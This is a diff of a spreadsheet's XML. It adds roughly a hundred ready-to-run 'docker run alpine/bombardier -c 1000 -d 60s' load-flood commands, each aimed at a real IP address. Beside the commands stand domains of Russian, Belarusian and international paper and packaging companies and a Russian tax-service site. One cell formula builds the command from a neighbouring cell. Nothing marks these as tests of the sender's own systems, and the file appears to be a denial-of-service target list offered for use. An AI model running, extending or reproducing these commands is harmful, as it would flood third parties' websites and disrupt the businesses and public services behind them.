-      <c r="A35" s="2"/>
-      <c r="B35" s="2"/>
-      <c r="C35" s="2"/>
+      <c r="A35" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B35&amp;"&amp;&amp; sleep 5;"</f>
+        <v>95</v>
+      </c>
+      <c r="B35" t="s" s="2">
+        <v>96</v>
+      </c>
+      <c r="C35" t="s" s="2">
+        <v>97</v>
+      </c>
       <c r="D35" s="3"/>
       <c r="E35" s="3"/>
     </row>

--- a/test.xlsx
+++ b/test.xlsx
@@ -11,48 +11,126 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="98">
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 35.246.6.109&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>35.246.6.109</t>
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="298">
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.20.1&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.217.20.1</t>
   </si>
   <si>
     <t>arkhbum.com</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.101.155.235&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>5.101.155.235</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 148.251.9.18&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>148.251.9.18</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 23.236.62.147&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>23.236.62.147</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.74.216.63&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>176.74.216.63</t>
   </si>
   <si>
     <t>utupack.ru</t>
   </si>
   <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.74.218.245&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>176.74.218.245</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.74.219.91&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>176.74.219.91</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.31.3.154&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>176.31.3.154</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.138.25.51&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>188.138.25.51</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 136.243.223.232&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>136.243.223.232</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.74.222.29&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>176.74.222.29</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 108.162.193.170&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>108.162.193.170</t>
+  </si>
+  <si>
+    <t>rostovbumaga.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 108.162.192.139&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>108.162.192.139</t>
+  </si>
+  <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.67.163.236&amp;&amp; sleep 5;</t>
   </si>
   <si>
     <t>172.67.163.236</t>
   </si>
   <si>
-    <t>rostovbumaga.ru</t>
-  </si>
-  <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.66.196&amp;&amp; sleep 5;</t>
   </si>
   <si>
     <t>104.21.66.196</t>
   </si>
   <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.127.158.62&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>92.127.158.62</t>
+  </si>
+  <si>
+    <t>sckkbur.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.127.158.61&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>92.127.158.61</t>
+  </si>
+  <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.127.158.63&amp;&amp; sleep 5;</t>
   </si>
   <si>
     <t>92.127.158.63</t>
   </si>
   <si>
-    <t>sckkbur.ru</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.226.223.50&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.226.223.50</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 141.8.192.54&amp;&amp; sleep 5;</t>
@@ -64,10 +142,25 @@
     <t>karavaevo.ru</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.50.4.200&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.50.4.200</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.105.85.119&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>172.105.85.119</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.87.203.101&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>80.87.203.101</t>
+  </si>
+  <si>
+    <t>ilimgroup.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 90.156.219.38&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>90.156.219.38</t>
   </si>
   <si>
     <t>sckk.by</t>
@@ -82,6 +175,654 @@
     <t>bmik-aquapack.by</t>
   </si>
   <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 142.250.27.26&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>142.250.27.26</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.233.184.26&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>64.233.184.26</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 209.85.202.27&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>209.85.202.27</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 142.250.153.26&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>142.250.153.26</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.233.184.27&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>64.233.184.27</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 142.251.111.26&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>142.251.111.26</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 86.57.246.186&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>86.57.246.186</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.159.250.29&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.159.250.29</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.159.252.109&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.159.252.109</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.17.150.118&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>188.17.150.118</t>
+  </si>
+  <si>
+    <t>pcbk.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.170.119.130&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>188.170.119.130</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.170.119.134&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>188.170.119.134</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.68.186.14&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>188.68.186.14</t>
+  </si>
+  <si>
+    <t>remos.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 198.185.159.144&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>198.185.159.144</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 46.173.190.195&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>46.173.190.195</t>
+  </si>
+  <si>
+    <t>akarton.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.172.11.199&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>85.172.11.199</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.24.64.138 &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t xml:space="preserve">213.24.64.138 </t>
+  </si>
+  <si>
+    <t>lkdr.nalog.gov.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.110&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.110</t>
+  </si>
+  <si>
+    <t>mondigroup.com</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.147&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.147</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.121&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.121</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.108&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.108</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.99&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.99</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.227&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.227</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.144&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.144</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.141&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.141</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.101&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.101</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.236&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.236</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.232&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.232</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.97&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.97</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.204&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.204</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.221&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.221</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.220&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.220</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.54.8&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.54.8</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.95&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.55.95</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 160.109.17.100&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>160.109.17.100</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 197.97.68.205&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>197.97.68.205</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.69.139.180&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>217.69.139.180</t>
+  </si>
+  <si>
+    <t>gofrotara54.com</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 216.239.36.101&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>216.239.36.101</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 216.239.38.101&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>216.239.38.101</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.230.63.171&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.230.63.171</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.108.88.100&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.108.88.100</t>
+  </si>
+  <si>
+    <t>pkf39.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.108.88.102&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.108.88.102</t>
+  </si>
+  <si>
+    <t>kbkf.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.29.57.18&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>37.29.57.18</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 79.104.53.186&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>79.104.53.186</t>
+  </si>
+  <si>
+    <t>sftgroup.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 90.156.201.21&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>90.156.201.21</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.160.70&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.160.70</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.160.69&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.33.160.69</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.139.132.28&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.139.132.28</t>
+  </si>
+  <si>
+    <t>smurfitkappa.com</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.115.60.190&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>85.115.60.190</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 208.87.234.190&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>208.87.234.190</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.115.52.190&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>85.115.52.190</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.115.54.190&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>85.115.54.190</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.97.158.3&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>176.97.158.3</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.97.158.1&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>176.97.158.1</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.97.158.2&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>176.97.158.2</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.174.68.4&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.174.68.4</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.174.68.1&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.174.68.1</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.174.68.3&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.174.68.3</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.108.4.192&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.108.4.192</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.108.4.216&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.108.4.216</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.139.132.44&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.139.132.44</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 40.91.209.208&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>40.91.209.208</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.108.4.185&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.108.4.185</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.108.4.159&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.108.4.159</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.139.132.15&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.139.132.15</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.139.132.10&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.139.132.10</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.139.132.43&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.139.132.43</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.108.4.187&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.108.4.187</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 63.239.189.56&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>63.239.189.56</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.194.244&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>31.31.194.244</t>
+  </si>
+  <si>
+    <t>karton-tmb.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.194.245&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>31.31.194.245</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.198.181&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>31.31.198.181</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.244.169.41&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.244.169.41</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.77&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.77</t>
+  </si>
+  <si>
+    <t>storaenso.com</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.240.75.40&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>92.240.75.40</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.240.75.7&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>92.240.75.7</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 99.131.30.251&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>99.131.30.251</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.233.125.10&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.233.125.10</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.12.228.150&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.12.228.150</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.89&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.89</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.82&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.82</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.66&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.66</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.76&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.76</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 137.117.148.100&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>137.117.148.100</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.229&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.229</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.232&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.232</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.130.248.66&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.130.248.66</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.194&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.194</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.198&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.198</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.199&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.199</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.160&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.160</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.201&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.201</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.204&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.204</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.251.98.6&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>194.251.98.6</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 137.116.194.239&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>137.116.194.239</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 179.191.85.150&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>179.191.85.150</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.237&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.237</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.130.248.77&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.130.248.77</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.130.248.74&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.130.248.74</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.130.248.72&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.130.248.72</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.73&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.73</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.210&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>192.46.71.210</t>
+  </si>
+  <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.210.81.10&amp;&amp; sleep 5;</t>
   </si>
   <si>
@@ -91,97 +832,49 @@
     <t>proletariy.ru</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.23.50.35&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>5.23.50.35</t>
-  </si>
-  <si>
-    <t>pcbk.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 82.202.236.195&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>82.202.236.195</t>
-  </si>
-  <si>
-    <t>remos.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.53.96.190&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>92.53.96.190</t>
-  </si>
-  <si>
-    <t>akarton.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.67.32.220&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>172.67.32.220</t>
-  </si>
-  <si>
-    <t>mondigroup.com</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.20.65.91&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>104.20.65.91</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.20.64.91&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>104.20.64.91</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 34.117.168.233&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>34.117.168.233</t>
-  </si>
-  <si>
-    <t>gofrotara54.com</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 82.202.222.106&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>82.202.222.106</t>
-  </si>
-  <si>
-    <t>pkf39.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.53.96.175&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>92.53.96.175</t>
-  </si>
-  <si>
-    <t>gofrokuban.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.104.84.50&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>89.104.84.50</t>
-  </si>
-  <si>
